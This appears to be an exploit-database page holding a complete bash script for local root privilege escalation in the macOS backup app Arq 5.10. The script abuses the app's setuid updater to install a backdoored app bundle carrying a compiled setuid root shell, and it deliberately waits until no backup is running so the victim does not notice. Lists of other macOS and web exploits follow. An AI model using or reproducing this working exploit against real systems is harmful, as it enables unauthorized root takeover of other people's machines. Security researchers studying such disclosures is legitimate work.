Menu

Search for hundreds of thousands of exploits

"Arq 5.10 - Local Privilege Escalation (2)"

Author

Exploit author

"Mark Wadham"

Platform

Exploit platform

macos

Release date

Exploit published date

2018-01-29

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
#!/bin/bash

#################################################################
###### Arq <= 5.10 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html              ######
#################################################################

app="/Applications/Arq.app"
res="$app/Contents/Resources"
lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources"

vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root`

if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi

if [ "$1" != "-f" ] ; then
  latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`"
  status_line="`egrep -i 'backup session.*?(ended|started)' \
    \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`"

  if [ "$status_line" != "" ] ; then
    echo -n "WARNING: backup in progress, the user will very "
    echo "likely notice if we exploit now!"
    echo "use -f to override."
    exit 1
  fi
fi

owd="`pwd`"

if [ -e ~/.arq_510_privesc_exp ] ; then
  rm -rf ~/.arq_510_privesc_exp
fi

mkdir ~/.arq_510_privesc_exp
cd ~/.arq_510_privesc_exp

echo "copying application..."

cp -R /Applications/Arq.app .

echo "compiling payloads..."

cat > payload.sh <<EOF
#!/bin/bash
rm -rf $HOME/.arq_510_privesc_exp
while :
do
  pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \
    |cut -d ' ' -f2\`
  if [ "\$pid" != "" ] ; then
    kill -9 \$pid
    open $app/Contents/Library/LoginItems/Arq\ Agent.app
    exit 0
  fi
done
EOF
chmod 755 payload.sh

au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'`

cat > shell.c <<EOF
#include <unistd.h>
#include <string.h>
int main(int ac, char *av[])
{
  if (ac > 1 && strcmp(av[1], "boom") == 0) {
    setuid(0);
    setgid(0);
    execl(
      "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr"
      "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay"
      "load.sh;/bin/bash", NULL
    );
  }
  return 0;
}
EOF
mv Arq.app/Contents/Resources/standardrestorer \
  Arq.app/Contents/Resources/standardrestorer.orig
gcc -o Arq.app/Contents/Resources/standardrestorer shell.c
rm -f shell.c

payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8`
GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1`
cwd=`pwd`

echo "creating backdoored Arq.zip..."
zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null
rm -rf Arq.app/

echo "executing upgrade..."

"$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \
  1>/dev/null 2>/dev/null

echo "waiting..."
while :
do
  ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8`
  x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root`

  if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then
    cd "$owd"
    $res/standardrestorer boom
    exit 0
  fi
  sleep 0.2
done
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-12 "MacOS 320.whatis Script - Privilege Escalation" local macos "Csaba Fitzl"
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-03-20 "VMware Fusion 11.5.2 - Privilege Escalation" local macos "Rich Mirch"
2020-03-17 "VMWare Fusion - Local Privilege Escalation" local macos Grimm
2019-12-18 "macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()" dos macos "Google Security Research"
2019-11-22 "macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache" local macos "Google Security Research"
2019-11-05 "macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()" dos macos "Google Security Research"
2019-11-04 "Apple macOS 10.15.1 - Denial of Service (PoC)" dos macos 08Tc3wBB
2019-10-09 "XNU - Remote Double-Free via Data Race in IPComp Input Path" dos macos "Google Security Research"
2019-09-19 "macOS 18.7.0 Kernel - Local Privilege Escalation" local macos A2nkF
Release Date Title Type Platform Author
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (1)" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (2)" local macos "Mark Wadham"
2017-12-06 "Sera 1.2 - Local Privilege Escalation / Password Disclosure" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.6 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.7 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Murus 1.4.11 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation" local macos "Mark Wadham"
2017-07-18 "Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation" local macos "Mark Wadham"
2017-04-11 "Proxifier for Mac 2.17/2.18 - Privesc Escalation" local macos "Mark Wadham" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected